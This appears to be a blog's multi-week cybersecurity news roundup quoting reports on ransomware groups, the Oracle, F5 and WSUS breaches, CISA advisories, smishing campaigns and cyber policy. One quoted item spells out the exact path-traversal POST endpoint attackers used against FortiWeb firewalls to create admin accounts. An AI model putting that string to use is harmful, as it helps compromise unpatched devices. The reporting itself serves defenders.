  • “Today, the Cybersecurity and Infrastructure Security Agency (CISA) released the “Implementation Guidance for Emergency Directive on Cisco Adaptive Security Appliances (ASA) and Firepower Device Vulnerabilities.” This guidance builds on CISA’s Emergency Directive 25-03: Identify and Mitigate Potential Compromise of Cisco Devices, issued on September 25, which identified known vulnerabilities and mandated immediate action to mitigate risks. Threat actors continue to target these devices, posing significant risks to all organizations.
  • “By following these best practices, organizations can better protect themselves from potential threats and ensure the integrity of their digital infrastructure,” said Nick Andersen, Executive Assistant Director for the Cybersecurity Division (CSD) at CISA. “The release of this implementation guidance is a critical step in mitigating the risks posed by these vulnerabilities.”
  • “In an ever-evolving threat landscape, this implementation guidance provides information on the minimum software versions that address these vulnerabilities and directs federal agencies to conduct corrective patching measures on devices that are not compliant with these requirements. CISA recommends all organizations verify that correct minimum software version updates are applied.
  • “For more information, please visit: Emergency Directive 25-03 Implementation Guidance and Temporary Risk Mitigation Guidance for Agencies in the Process of ED 25-03 Compliance for detailed recommendations and CISA’s RayDetect scanner to examine ASA core dumps for evidence of RayInitiator compromise.” 

• Cybersecurity Dive adds,
  • “An advanced persistent threat actor has been targeting zero-day vulnerabilities in Cisco Identity Service Engine as well as Citrix, according to a blog post published Wednesday [November 12, 2025] by security researchers at Amazon.”
    
• Per Tech Radar,
  • “Digital privacy is a growing concern these days, with millions turning to virtual private networks to shield their online activity.
  • “However, in a stark new warning, Google has confirmed that cybercriminals are exploiting this need for security by distributing malicious applications disguised as legitimate VPN services. This creates a dangerous situation where a tool meant to be a shield is, in fact, a weapon used to steal sensitive user data.
  • “The alert was issued as part of Google’s November 2025 fraud and scams advisory, which details the latest trends in online threats. Alongside warnings about AI-driven job scams and holiday-themed phishing schemes, the advisory specifically calls out the danger of fraudulent VPN apps and browser extensions.”

• An ISACA commentator explains why more cyber tools can make you less secure.
  • “On his deathbed, the actor Edmund Kean famously said, “Dying is easy. Comedy is hard.”  Here’s my version for cybersecurity professionals: Buying is easy. Operating is hard.
  • “It all comes down to the unglamorous, disciplined work of process, by which I mean configuration, testing, documentation and ownership. That’s what creates resilience. No, that work doesn’t photograph well, and it doesn’t come with a vendor logo. But it’s the difference between a security program and a shopping list.
  • “Buying a tool gives you the illusion of safety. Running it well gives you the reality. My advice? Choose reality. Everything else is marketing.”

From the ransomware front,

• Cyberscoop reports,
  • “Federal cyber authorities shared new details Thursday about the Akira ransomware group’s techniques, the tools it uses and vulnerabilities it exploits for initial access alongside the release of a joint cybersecurity advisory.
  • “Members of the financially motivated group, which initially appeared in March 2023, are associated with other threat groups, including Storm-1567, Howling Scorpius, Punk Spider, Gold Sahara, and may have connections with the disbanded Conti ransomware group, officials said. Akira uses a double-extortion model, encrypting systems after stealing data to amplify pressure on victims.
  • “Akira ransomware has claimed more than $244 million in ransomware proceeds as of late September, the FBI and Cybersecurity and Infrastructure Security agency said in the joint advisory. The group primarily targets small- and medium-sized businesses with many victims impacted in the manufacturing, education, IT, health care, financial and agriculture sectors.
  • “For the FBI, it is within the top five variants that we investigate,” Brett Leatherman, assistant director at the FBI Cyber Division, said during a media briefing Thursday. “It’s consequential. This group is very consequential that they fall likely within our top five.” * * *
  • “The joint advisory, which updates previous guidance around hunting for and defending against Akira, was not in response to any specific attack, said Nick Andersen, executive assistant director for cybersecurity at CISA.” 
• and
  • “The Washington Post said it, too, was impacted by the data theft and extortion campaign targeting Oracle E-Business Suite customers, compromising human resources data on nearly 10,000 current and former employees and contractors.
  • “The company was first alerted to the attack and launched an investigation when a “bad actor” contacted the media company Sept. 29 claiming they gained access to the company’s Oracle applications, according to a data breach notification it filed in Maine Wednesday. The Washington Post later determined the attacker had access to its Oracle environment from July 10 to Aug. 22. 
  • “The newspaper is among dozens of Oracle customers targeted by the Clop ransomware group, which exploited a zero-day vulnerability affecting Oracle E-Business Suite to steal heaps of data. Other confirmed victims include Envoy Air and GlobalLogic.”

• Bleeping Computer adds,
  • “Hardware accessory giant Logitech has confirmed it suffered a data breach in a cyberattack claimed by the Clop extortion gang, which conducted Oracle E-Business Suite data theft attacks in July.
  • “Logitech International S.A. is a Swiss multinational electronics company that sells hardware and software solutions, including computer peripherals, gaming, video collaboration, music, and smart home products.
  • “Today [November 14, 2025], Logitech filed a Form 8-K with the U.S. Securities and Exchange Commission, confirming that data was stolen in a breach.”

• The Hacker News relates
  • 85 active ransomware and extortion groups observed in Q3 2025, reflecting the most decentralized ransomware ecosystem to date.
  • 1,590 victims disclosed across 85 leak sites, showing high, sustained activity despite law-enforcement pressure.
  • 14 new ransomware brands launched this quarter, proving how quickly affiliates reconstitute after takedowns.
  • LockBit’s reappearance with version 5.0 signals potential re-centralization after months of fragmentation.

• Security Boulevard offers zero trust insights from the Ingram Micro ransomware attack.
  • “The Ingram Micro ransomware attack serves as a potent reminder that credential theft and internal propagation can cripple even the most robust enterprises. When attackers move freely within a trusted environment, it’s not just the perimeter that’s at risk. It’s every file, every system, and every partner connected to the network. The lesson is clear: true prevention requires more than detection or containment. It demands a mindset where every file, from every source, is verified safe before it’s allowed to move between channels, endpoints, and users.”

From the cybersecurity defenses front,

• Healthcare Dive offers tips to improve healthcare system cybersecurity.
  • “Healthcare organizations should invest in post-attack recovery and carefully evaluate risks from vendors, according to industry experts who spoke at a Healthcare Dive virtual event.”

• Cyberscoop reports,
  • “The phishing kit Lighthouse, which has aided text scams like those soliciting victims to pay unpaid road tolls, appears to have been hampered shortly after Google filed a lawsuit aimed at its creators.
  • “Google said on Thursday [November 13, 2025] that Lighthouse had been shut down. Two other organizations that have tracked the suspected Chinese operators of Lighthouse said they saw signs it had at least been disrupted.
  • “This shut down of Lighthouse’s operations is a win for everyone,” said Halimah DeLaine Prado, general counsel at Google. “We will continue to hold malicious scammers accountable and protect consumers.”
  • “Google filed its lawsuit in the U.S. District Court for the Southern District of New York. They allege that 25 unnamed individuals behind Lighthouse have violated racketeering, trademark and anti-hacking laws with their prolific SMS phishing, or “smishing,” platform.”

• Bleeping Computer lets us know,
  • “Fortinet has confirmed that it has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now “massively exploited in the wild.”
  • “The flaw was silently patched after reports that unauthenticated attackers were exploiting an unknown FortiWeb path traversal flaw in early October to create new administrative users on Internet-exposed devices.
  • “The attacks were first identified by threat intel firm Defused on October 6, which published a proof-of-concept exploit and reported that an “unknown Fortinet exploit (possibly a CVE-2022-40684 variant)” is being used to send HTTP POST requests to the /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi Fortinet endpoint to create local admin-level accounts.”

• Cybersecurity Dive informs us,
  • “Businesses face a range of problems with their threat intelligence platforms, including difficulty assessing the accuracy of alerts and problems integrating the platforms with their existing tools, according to a report that Recorded Future published on Wednesday.
  • “The report, which assessed the state of threat intelligence in enterprises, found that 83% of companies have dedicated threat intelligence teams, a slight uptick from last year.
  • “Roughly half of companies (48%) pay for more than one threat intelligence service, while 41% pay for only one.”

• Dark Reading relates,
  • “New survey data indicates that organizations are pushing hard for passwordless authentication.
  • “A significant chunk of online account passwords in 2025 remain basic and easy to crack — a fact that will surprise few. But last month, Dark Reading asked readers how their organizations are handling password security these days. The results were, perhaps surprisingly, optimistic.
  • “As we enter the second quarter of the 21st century, rather than applying new Band-Aids to the problem, organizations finally appear to be moving toward a future with few to no passwords at all.”

• Dark Reading offers insights into Apple / Mac security tools.

• Here’s a link to Dark Reading’s CISO Corner.

From the cybersecurity policy and law enforcement front,

• Federal News Network tells us,
  • “The Office of the National Cyber Director is looking to engage industry as it starts to develop a new national cybersecurity strategy.
  • “National Cyber Director Sean Cairncross, speaking at a conferenced hosted by Palo Alto Networks in Tyson’s Corner, Va., Thursday, said U.S. cyber efforts of the past have failed to “send a message” to China and other cyber adversaries.
  • “A failure to send a message creates an opening for a miscalculation, that opens the door for a larger problem,” Cairncross said. “And so, what we are looking to do is to change that posture, so that that message is clear.” * * *
  • “I’m not trying to bring CEOs in and beat them over the head and say, do this, or we’ll regulate, or this is a mandate coming down from on high,” he said. “What I’m looking to do is to say where, where are the regulatory friction points in this domain that you deal with, what’s redundant, what’s become too much of a compliance checklist.”
  • “Cairncross said the private sector should have to meet minimum standards for cybersecurity. But he says the White House wants to work with businesses to understand how cybersecurity could be better prioritized against existing regulations.”
  • “Working to harmonize that regulatory structure, it’s incumbent on us to do that and work with you all to do that, hopefully as rapidly as we can,” he said. “But I see this as a true partnership between government and industry, and I think if we can get that in a place where everyone is sort of speaking the same language, it will be incredibly useful for hardening our resiliency.”
  • “The Trump administration’s cyber strategy will also likely feature a focus on normalizing offensive cyber operations.”

• NextGov/FCW informs us,
  • “Criminal hackers, who for years lacked the sophistication and resources of nation-state cyber adversaries, are now on near-equal footing with state-level powers like China and Russia, thanks to advances in artificial intelligence, the head of the FBI’s Cyber Division said Thursday.
  • “[AI] allows mid-tier actors to really asymmetrically scale in ways that they can’t have impact otherwise, meaning a lot of these cybercriminal groups now have nation-state-type capabilities that they would not otherwise have because they’re using generative AI,” Brett Leatherman said Thursday at the Palo Alto Networks public sector conference in Virginia.” * * *
  • “The FBI has not been as quick to adopt AI in its day-to-day operations because it handles sensitive data that requires stringent protections and oversight to maintain security and legal standards, he said.” * * *
  • “The FBI constantly views data logs and other intelligence collected from legal authorities that can help them track hackers and build computer forensic conclusions. Having AI available to quickly parse those logs would be a benefit, he said, although industry partners are already using their own AI instruments to scan data and report those findings to the FBI.” 
    
• Fedscoop adds,
  • The Department of Energy is set to deploy a new artificial intelligence supercomputer at Oak Ridge National Laboratory early next year, bringing the machine online at “record speeds” thanks to a new public-private partnership the agency unveiled Monday.
  • The deal with Advanced Micro Devices will provide Oak Ridge with the company’s Lux AI cluster, giving the lab expanded “near-term AI capacity” that will accelerate its work on fusion, fission, materials discovery, advanced manufacturing and grid modernization, per a press release announcing the partnership. 
  • “Winning the AI race requires new and creative partnerships that will bring together the brightest minds and industries American technology and science has to offer,” Energy Secretary Chris Wright said in a statement. “That’s why the Trump administration is announcing the first example of a new commonsense approach to computing partnerships with Lux.”
  • Energy also announced plans for the 2028 launch of Discovery, a system built by HPE and powered by AMD processors and accelerators. Discovery, according to the DOE, will “far” outperform Oak Ridge’s Frontier machine — currently the world’s second-largest supercomputer. * * *
  • “The Tennessee lab has been ground zero for many of the country’s advances in AI — and the Trump administration has signaled that there’s more to come. In an RFP released earlier this month, the DOE solicited proposals for the buildout and maintenance of AI data centers and energy generation infrastructure at Oak Ridge.”

• Dark Reading reports,
  • “As China, Iran, Russia, and the European Union signed onto a new global cybercrime treaty, the United States and a minority of other nations continue to voice concerns over the global agreement’s impact on human rights — and the expansion of covered crimes to including any “serious” offense enabled by information communications technology (ICT).
  • “On Monday, more than 70 nations signed on to the treaty — formally, the United Nations Convention Against Cybercrime — pledging to aid in the investigation and prosecution of any “criminal offences … committed through the use of information and communications technology systems,” according to a copy of the document. Signers of the agreement promise to cooperate on “serious” crimes, which includes any violation of law that has a maximum prison time of at least four years.” * * *
  • [M]any nations signing the treaty may not have such laudable goals. In 2019, Russia began the process to establish the treaty, when its delegates sponsored a resolution to create a framework for combatting cybercrime. The other signatories included a list of authoritarian countries: Belarus, Cambodia, China, Iran, Myanmar, Nicaragua, Syria, and Venezuela, with the highest-ranking country among the sponsors earning a 2.94 on The Economist’s 10-point Democracy Index for 2024. For comparison, the Index’s most democratic nation, Norway, scored a 9.81. The Nordic country did not sign the UN cybercrime treaty, either.
  • “Looking at the group of founders should make any policy watcher skeptical, especially with much of the cybercriminal activity coming from China and Russia, says Zach Edwards, a senior threat analyst with Silent Push, a cyberthreat intelligence firm. He pointed to massive economic costs caused by cybercriminals groups in China and Russia.”

• Per Cyberscoop,
  • “A 43-year-old Ukrainian national allegedly involved in the Conti ransomware group pleaded not guilty in federal court Thursday to cybercrime charges that could land him in prison for up to 25 years, according to court documents.
  • “Oleksii Oleksiyovych Lytvynenko, also known as Alexsey Alexseevich Litvinenko, was arrested in Ireland in July 2023, extradited to the United States earlier this month and remains in federal custody in Tennessee where at least three of his alleged victims are based.” * * *
  • “Lytvynenko and his co-conspirators used Conti ransomware to attack more than 1,000 victims globally, ensnaring victims in 47 states, Washington, Puerto Rico and about 31 countries, according to the Justice Department. The FBI estimates Conti extorted more than $150 million in ransom payments from victims.”

From the cybersecurity vulnerabilities and breaches front,

• Cybersecurity Dive reports,
  • “The Cybersecurity and Infrastructure Security Agency issued updated guidance on a critical vulnerability in Windows Server Update Service and urged security teams to immediately apply patches to their systems and check for potential compromise.
  • “The vulnerability, tracked as CVE-2025-59287, involves deserialization of untrusted data in WSUS, a tool widely used by IT administrators to deploy Microsoft product updates. 
  • Security researchers have been tracking a series of exploitation attemptsin recent weeks. An initial patch issued in mid-October fell flat, and Microsoft issued an emergency out-of-band security update late last week. 
  • “CISA on Wednesday [October 29] issued additional guidance on how to check for potential compromise and warned security teams to take the threat very seriously.
• and
  • “At least 50 organizations have been impacted by attacks targeting a critical vulnerability in Windows Server Update Service, with most of them located in the U.S., according to researchers at cybersecurity firm Sophos. 
  • “The vulnerability, tracked as CVE-2025-59287, involves deserialization of untrusted data. A security update issued by Microsoft in mid-October failed to provide adequate protection, and Microsoft issued an emergency out-of-band patch late last week to address the problem. 
  • “Sophos’s own telemetry picked up six incidents linked to the exploitation activity, and additional intelligence gathered by researchers shows at least 50 victims, the company told Cybersecurity Dive.” 

• CISA added four known exploited vulnerabilities to its catalog this week.
  • October 28, 2025
    • CVE-2025-6204 Dassault Systèmes DELMIA Apriso Code Injection Vulnerability
    • CVE-2025-6205 Dassault Systèmes DELMIA Apriso Missing Authorization Vulnerability
      • Security Week discusses these KVEs here.
  • October 30, 2025
    • CVE-2025-24893 XWiki Platform Eval Injection Vulnerability
    • CVE-2025-41244 Broadcom VMware Aria Operations and VMware Tools Privilege Defined with Unsafe Actions Vulnerability
      • NIST discusses the XWiki KVE here.
      • Bleeping Computer discusses the Broadcom KVE here.

• Cyberscoop relates,
  • “F5 CEO François Locoh-Donou said on a company earnings call that there were two categories of impact on customers following a nation-state attacker’s long-term, persistent access to its systems: widespread emergency updates to BIG-IP software and hardware, and customers whose configuration data was stolen during the attack.
  • “We were very impressed frankly, with the speed with which our customers have mobilized resources to be able to make these upgrades and put them in production fairly rapidly,” Locoh-Donou said Monday. F5 helped thousands of customers install critical updates upon disclosure, he added.
  • “The vendor’s latest assessment of the prolonged attack, which it became aware of Aug. 9 and disclosed Oct. 15, indicates F5 remains optimistic it has contained and limited exposure from the breach, which prompted a rare emergency directive from federal cyber authorities when it was disclosed in a regulatory filing.”

• Per Dark Reading,
  • “A researcher has demonstrated that Windows’ native artificial intelligence (AI) stack can serve as a vector for malware delivery.
  • “In a year where clever and complex prompt injection techniques have been growing on trees, security researcher hxr1 identified a much more traditional way of weaponizing rampant AI. In a proof-of-concept (PoC) shared exclusively with Dark Reading, he described a living-off-the-land attack (LotL) using trusted files from the Open Neural Network Exchange (ONNX) to bypass security engines.”
• and
  • “A variety of old, abandoned projects, long considered dead, continue to rise up and undermine the cybersecurity posture of the companies who created them.
  • “From code to infrastructure to APIs, these so-called “zombie” assets continue to cause security headaches for companies, and sometimes, lead to breaches. Oracle’s “obsolete” servers, abandoned Amazon S3 buckets used by attackers to distribute malware, and the unmonitored API connecting Optus’ customer-identity database to the Internet are all variations of the zombies plaguing enterprises.
  • “The lack of attention to forgotten — dare we say, “undead” — services causes cybersecurity headaches in two ways, says Andrew Scott, director of product at cybersecurity firm Palo Alto Networks.
  • “If you’ve got a device that has been forgotten, you’re probably not looking after it, so if it were compromised, it may be hard for you to know,” he says. “And two: The longer that those things stay out there, stay unmanaged or not getting the TLC and patch cycles … the more likely that they are vulnerable to risks over time.”

From the ransomware front,

• Health Exec reports,
  • “On Oct. 27, Russia-based cybercrime group Qilin posted to the dark web claiming it had successfully hacked pharmacy benefit manager (PBM) MedImpact, with the group releasing screenshots of documents that appear to be billing invoices.
  • “In reviewing the post, Cybernews said the snippets are “mostly financial operation details which don’t seem to contain extremely sensitive personal data.” The company later confirmed that what Qilin said was true, releasing a short statement about its ongoing investigation into the incident, which it said is being conducted with the “assistance of one of the nation’s leading cybersecurity firms and is notifying all applicable authorities.” 
  • “The PBM also confirmed that the attack involved the deployment of ransomware, and that at least part of its infrastructure is still down. It said it deployed containment measures upon noticing the breach, often involving taking all systems offline until the situation is assessed.
  • “MedImpact is currently working to restore impacted systems in a new environment that is segregated from the prior infrastructure and protected by multiple layers of defense. Due to these measures, as of today, pharmacy claims for all clients are now adjudicating,” the company wrote. 
  • “The company apologizes for any disruption this issue may cause its clients and partners,” it added.” 

• Per Bleeping Computer,
  • “CISA confirmed on Thursday [October 30] that a high-severity privilege escalation flaw in the Linux kernel is now being exploited in ransomware attacks.
  • “While the vulnerability (tracked as CVE-2024-1086) was disclosed on January 31, 2024, as a use-after-free weakness in the netfilter: nf_tables kernel component and was fixed via a commit submitted in January 2024, it was first introduced by a decade-old commit in February 2014.
  • “Successful exploitation enables attackers with local access to escalate privileges on the target system, potentially resulting in root-level access to compromised devices.
  • As Immersive Labs explains, potential impact includes system takeover once root access is gained (allowing attackers to disable defenses, modify files, or install malware), lateral movement through the network, and data theft.

• The Hacker News explains how Russian Ransomware Gangs Weaponize Open-Source AdaptixC2 for Advanced Attacks.

• The HIPAA Journal reports,
  • “The ransomware remediation firm Coveware has reported a growing divide in the ransomware landscape, with larger enterprises facing increasingly targeted, high-cost attacks, whereas attacks on mid-market companies continue to be conducted in volume. Ransomware groups conducting high-volume attacks appear to have found the sweet spot, as while the ransom payments they receive are much lower, the attacks are easier to conduct, and a higher percentage of victims pay up. Attacks on larger companies require more effort, although attacks are far more lucrative when a ransom is paid. Coveware reports that larger organizations are increasingly resisting paying ransoms, having realized that there are few payment benefits, but has warned that these targeted attacks are likely to increase due to falling ransom payments.
  • “Across the board, there has been a sharp fall in both the average and median ransom payments from a 6-year high in Q2, 2025, to the lowest level since Q1, 2023. In Q3, 2025, the average ransom payment fell by 66% to $376,941, with the median ransom payment down 65% to $140,000. In Q1, 2019, 85% of victims of ransomware attacks chose to pay the ransom, compared to a historic low of 23% in Q3, 2025.”

From the cybersecurity business and defenses front,

• The Wall Street Journal reports,
  • “Artificial intelligence and weakening federal demand had dual impacts on this week’s earnings reports from large cybersecurity companies, which generally posted stronger results than the same time last year.
  • “Security and network specialist F5 posted a fourth-quarter profit of $190.5 million on Monday, up from $165.3 million last year. Its full-year profit was $692.4 million, compared with $566.8 million last year.
  • “However, the company warned of potential sales disruptions stemming from a breach by nation-state hackers. The breach, which was disclosed by F5 in October, was serious: Attackers gained access to the production environment for the company’s most popular products and its database of known software flaws. F5’s products are widely deployed among Fortune 500 companies and the federal government, making the disclosure worthy of briefings by the U.S. Cybersecurity and Infrastructure Security Agency.” * * *
  • “Other cybersecurity companies posted encouraging results. Network security vendor Check Point Software Technologies posted a third-quarter profit of $358.7 million, up from $206.9 million last year. The Israeli company closed its acquisition of AI specialist Lakera last week and said it expects AI to inform its acquisition strategy going forward.” * * *
  • “Infrastructure security specialist Tenable Holdings swung to a $2.3 million profit in its third quarter from a $9.3 million loss the previous year. Co-Chief Executive Stephen Vintz said the company is seeing a shift in customer spending away from traditional defensive strategies toward more proactive technologies that identify weaknesses before they are exploited, largely due to the use of AI.
  • “AI is dramatically reshaping the threat landscape as attacks have become faster, more automated and more sophisticated,” he said on a call with analysts Thursday.
  • “Data protection provider Commvault Systems reported $14.7 million profit for its second quarter on Tuesday, though this slipped from $15.6 million in the same quarter last year. Rival data security company Varonis reported a loss of $29.9 million, wider than the $18.3 million loss the previous year.”
    
• Cyberscoop points out,
  • “A new security-focused AI model released Thursday by OpenAI aims to automate bug hunting, patching and remediation.
  • “The model, powered by ChatGPT-5 and given the name Aardvark, has been used internally at OpenAI and among external partners. Currently offered in an invite-only Beta, it’s designed to continuously scan source code repositories to find known vulnerabilities and bugs, assess and prioritize their potential severity, then patch and remediate them.
  • “In a blog post published on the company’s website, OpenAI claims that Aardvark “does not rely on traditional program analysis techniques like fuzzing or software composition analysis.”
  • “Instead, it uses LLM-powered reasoning and tool-use to understand code behavior and identify vulnerabilities,” the blog stated. “Aardvark looks for bugs as a human security researcher might: by reading code, analyzing it, writing and running tests, using tools, and more.”

• Here is a link to Dark Reading’s CISO Corner.

From the cybersecurity policy front and law enforcement front,

• Federal News Network reports,
  • “For years, the influential Cyberspace Solarium Commission has advanced recommendations on cyber policy that have slowly but steadily been adopted by Congress and federal agencies.
  • “But now, commission leaders are confronting a new reality: progress is “stalling, and in several areas, slipping,” largely due to the Trump administration’s federal workforce cuts.
  • “In its latest annual report, the Cyberspace Solarium Commission 2.0 — the “2.0” because the commission no longer resides within Congress but at the Foundation for the Defense of Democracies — found that there had been a “reversal” on its recommendations for the first time in the commission’s five-year history.”

• Dark Reading adds,
  • “Cyberattacks against US agencies were rising steadily even before Oct. 1, in anticipation of the shutdown. Researchers at the Media Trust then observed a spike of activity on its very first day.
  • “At this point, they’re projecting that the feds will experience north of 555 million cyberattacks by the end of the month [of October] — an 85% increase over the already more active than usual month of September.”
  • “To make matters worse, Media Trust CEO Chris Olson points out that those 555 million attacks aren’t the cheap phishing chum one might expect to dominate such a dataset.
  • “These are targeted digital attacks through websites, apps, and targeted advertising. What we are detecting are actual interactions with employees,” he says.”
    
• Dark Reading also informs us,
  • “A massive seizure by the US government of cryptocurrency from a sprawling Southeast Asia cybercrime syndicate has raised hopes that coordinated actions against cybercriminal groups can help undermine their profits.
  • “On Oct. 14, the US Department of Justice — along with the Drug Enforcement Agency, the Department of State, and other agencies — announced the seizure of 127,271 bitcoin kept in “unhosted wallets” and the indictment of Chen Zhi, the founder and chairman of the Prince Holding Group, on charges of conspiracy to commit wire fraud and money laundering. The seized bitcoin, stored in 25 wallets, are worth more than $14 billion, and were valued at nearly $15 billion on the day of the announcement.” * * *
  • “Repeating the win will be difficult, however.
  • “While the US Department of Justice and government officials announced the seizure and indictment on Oct. 14, the actual investigation and enforcement actions occurred last year and the investigation took much longer. The seizure of the funds likely took place in June and July of 2024, when the wallets holding the bitcoin “suddenly lit up … suggesting coordinate[d] enforcement activity,” says TRM Labs’ Redboard.
  • “These operations are exceptionally hard to pull off,” he says. “They require cooperation across agencies and borders, and — critically — access to private keys. Investigators can map transactions forever, but they can’t move assets without those keys. The fact that the US was able to gain control here means that digital and physical evidence aligned, resulting in a great outcome.” * * *
  • “The successful seizure may also reverse a trend that blockchain experts have noted: Cybercriminals’ increasing dependency on bitcoin. While other cryptocurrencies exist — and stable coin has become popular among some investors — bitcoin’s self-custody attribute has been seen as a significant benefit, says Eric Jardine, cybercrimes research manager at Chainalysis, a crypto intelligence firm.” * * *
  • “Whether the seizure by the US government results in a movement away from bitcoin remains to be seen.”

From the cybersecurity vulnerabilities and breaches front,

• Cybersecurity Dive reports,
  • “Security researchers are warning that cyber threat actors are abusing a critical vulnerability in Microsoft Windows Server Update Service. 
  • “The vulnerability, tracked as CVE-2025-59287, involves deserialization of untrusted data and could allow intruders to execute code without authorization.
  • “Researchers at Huntress said they have seen attackers exploiting the vulnerability in four different customers’ networks. 
  • “Senior security researcher John Hammond described the attack as a simple “point-and-shoot” technique, noting that the recent release of a proof of concept made the attack trivially accessible for any hacker to launch.” * * *
  • “In an advisory released late Friday [October 24], CISA urged users to identify servers that are vulnerable to exploitation and immediately apply the upgrades. These servers have WSUS Server Role enabled, and ports open to 8530/8531, according to CISA.”
    
• Cyberscoop adds,
  • “Last week, Cybersecurity and Infrastructure Security Agency officials spoke candidly about the challenges they faced tracking the use of F5 products across the civilian federal government. While CISA knows there are thousands of instances of F5 currently in use, it admitted it wasn’t certain where each instance was deployed. 
  • “The uncertainty came as the agency issued an emergency directive related to F5, instructing other government agencies to find and patch any F5 instances. The urgency stemmed from the fact that F5 itself had revealed a nation-state had gained a long-term foothold in its systems.
  • “One of the main goals of the directive: “help us identify the different F5 technology in the federal network,” as one official told reporters.
  • “CISA didn’t already have a complete picture of that despite the billions of dollars spent on a program, Continuous Diagnostics and Mitigation (CDM), designed for, among other things, “increasing visibility into the federal cybersecurity posture,” which CISA’s website for the program states is one of its main four goals.
  • “CISA’s lack of awareness about the extent of the F5 vulnerability’s presence in the federal government highlights a weakness in a program that is, by and large, a well-regarded one. But the fact that CDM did not automatically identify F5 prevalence is a circumstance of fast-changing technology and a shortcoming in the part of CDM that’s focused on keeping track of digital assets, according to current and former CISA officials and cyber industry professionals.”
    
• CISA added the following known exploited vulnerabilities to its catalog this week,
  • October 20, 2025
    • CVE-2022-48503 Apple Multiple Products Unspecified Vulnerability 
    • CVE-2025-2746 Kentico Xperience Staging Sync Server Digest Password Authentication Bypass Vulnerability
    • CVE-2025-2747 Kentico Xperience Staging Sync Server None Password Type Authentication Bypass Vulnerability
    • CVE-2025-33073 Microsoft Windows SMB Client Improper Access Control Vulnerability 
    • CVE-2025-61884 Oracle E-Business Suite Server-Side Request Forgery (SSRF) Vulnerability
      • Security Affairs discusses the five KVEs here.
      • CRN and Security Week focus on the Oracle KVE.
  • October 22, 2025
    • CVE-2025-61932. Motex LANSCOPE Endpoint Manager Improper Verification of Source of a Communication Channel Vulnerability
      • The Hacker News discusses the Motex KVE here.
  • October 24, 2025
    • CVE-2025-54236 Adobe Commerce and Magento Improper Input Validation Vulnerability
    • CVE-2025-59287 Microsoft Windows Server Update Service (WSUS) Deserialization of Untrusted Data Vulnerability 
      • HelpNetSecurity and Dark Reading discusses the Adobe KVE.
      • The Windows KVE is discussed above.

• Cybersecurity Dive relates,
  • “Critical flaws in TP-Link Omada and Festa VPN routers could allow attackers to take control of a device, according to a report released Thursday from Forescout Research – Vedere Labs. 
  • “One vulnerability, tracked as CVE-2025-7850, could enable OS command injection through improper sanitation of user input, according to the researchers. The flaw, which has a severity score of 9.3, in some cases can be exploited without requiring credentials to the device.
  • “A second vulnerability, tracked as CVE-2025-7851, allows root access via residual debug code, and has a severity score of 8.7. The flaw exposes hidden functionality that allows for root login via SSH, Forescout researchers told Cybersecurity Dive.
  • “TP-Link devices have been the target of exploitation activity in the past, including large botnets such as Quad7, says Daniel dos Santos, head of research at Forescout Research.” * * *
  • The researchers said they are not aware of any exploitation involving the newly found vulnerabilities but given that one is rated as critical and the other as high-severity, users should immediately apply new firmware updates issued by TP-Link.”
• and
  • “Half of all organizations have been “negatively impacted” by security vulnerabilities in their AI systems, according to recent data from EY.
  • “Only 14% of CEOs believe their AI systems adequately protect sensitive data.
  • “AI’s new risks are compounding the difficulty of securing networks with a patchwork of cybersecurity defenses as organizations use an average of 47 security tools, EY found.”
    
• Fierce Network adds,
  • “Beware. It’s that time of year when many employees are being told it’s open enrollment and they’re given a deadline to renew their health benefits. But if an unverified and unexpected message comes through SMS on your smartphone, it might be a smishing attack.
  • “Don’t click on the link, however tempting it may be.
  • “That’s one bit of advice from Chris Novak, VP of Global Cybersecurity Solutions at Verizon Business. He talked with Fierce about the latest Verizon Mobile Security Index that shows just how vulnerable mobile devices are to attacks. And guess what? AI isn’t helping matters. In fact, it’s putting devices more at risk.”

• Cyberscoop notes,
  • “Researchers have uncovered a long-running phishing campaign that uses text messages to trick victims, and it’s both bigger and more complex than previously thought. The operation, dubbed Smishing Triad, is managed in Chinese and involves thousands of malicious actors, including dozens of active, high-level participants, Palo Alto Networks’ research unit told CyberScoop.
  • “Unit 42 has traced about 195,000 domains to the highly decentralized phishing operation since January 2024. Researchers say more than two-thirds of the malicious domains are registered through Hong Kong-based registrar Dominet (HK) Limited using China-based domain name system infrastructure.
  • “Most of the attack domains (58%) are hosted on U.S.-based IP addresses, while 21% are hosted in China and 19% reside in Singapore. The global phishing operation is designed to collect sensitive information, including national identification numbers, home addresses, financial details and credentials, according to Unit 42.
  • “The malicious domains, which include hyphenated strings followed by a top-level domain, trick victims into thinking they are visiting a legitimate site. These domains impersonate services across many critical sectors including toll road services, multinational financial service and investment firms, e-commerce markets and cryptocurrency exchanges, health care organizations, law enforcement agencies and social media platforms.”

• HelpNetSecurity explains how “attackers turn trusted OAuth apps into cloud backdoors.”

• Cybersecurity Dive points out that “social engineering gains ground as preferred method of initial access [for cyberattacks]. Senior executives and high-net-worth individuals are increasingly at risk as hackers use deepfakes, voice cloning and other tactics for targeted attacks.”

From the ransomware front,

• The HIPAA Journal reports,
  • “Ransomware groups are conducting fewer attacks than a year ago and are increasingly adopting a more targeted approach using stealthy tactics to achieve more impactful results, according to the 2025 Global Threat Landscape Report from the network detection and response (NDR) company ExtraHop.
  • “Indiscriminate attacks are being dropped in favor of targeted, sophisticated attacks that allow ransomware actors to spend longer inside victims’ networks as they move undetected to achieve an extensive compromise before deploying their file-encrypting payloads. Attacks are designed to cause maximum damage and extensive downtime, which both increases the likelihood of a ransom being paid and allows them to obtain higher ransom payments.
  • “ExtraHop reports that in the space of a year, the average ransom demand has increased by more than one million dollars, from $2.5 million a year ago to $3.6 million, although ransom demands are higher for healthcare organizations and government entities. 70% of victims end up paying the ransom.
  • “Last year, ExtraHop tracked an average of 8 incidents per organization compared to 5-6 incidents this year. Ransomware actors typically have access to victims’ networks for almost two weeks before they launch their attack, during which time sensitive data is exfiltrated. It typically takes victims more than two weeks to respond to a security alert and contain an attack, with the attacks causing an average downtime of around 37 hours.”

• CSO adds,
  • “Two in five companies that pay cybercriminals for ransomware decryption fail to recover data as a result, according to a survey of 1,000s SMEs by insurance provider Hiscox.
  • “The survey also revealed that ransomware remains a major threat, with 27% of businesses surveyed reporting an attack in the past year. Of those affected, 80% — which includes both insured and uninsured businesses — paid a ransom in an attempt to recover or protect critical data.
  • “But only 60% successfully recovered all or part of their data as a result, Hiscox’s Cyber Readiness Report found.”
• and
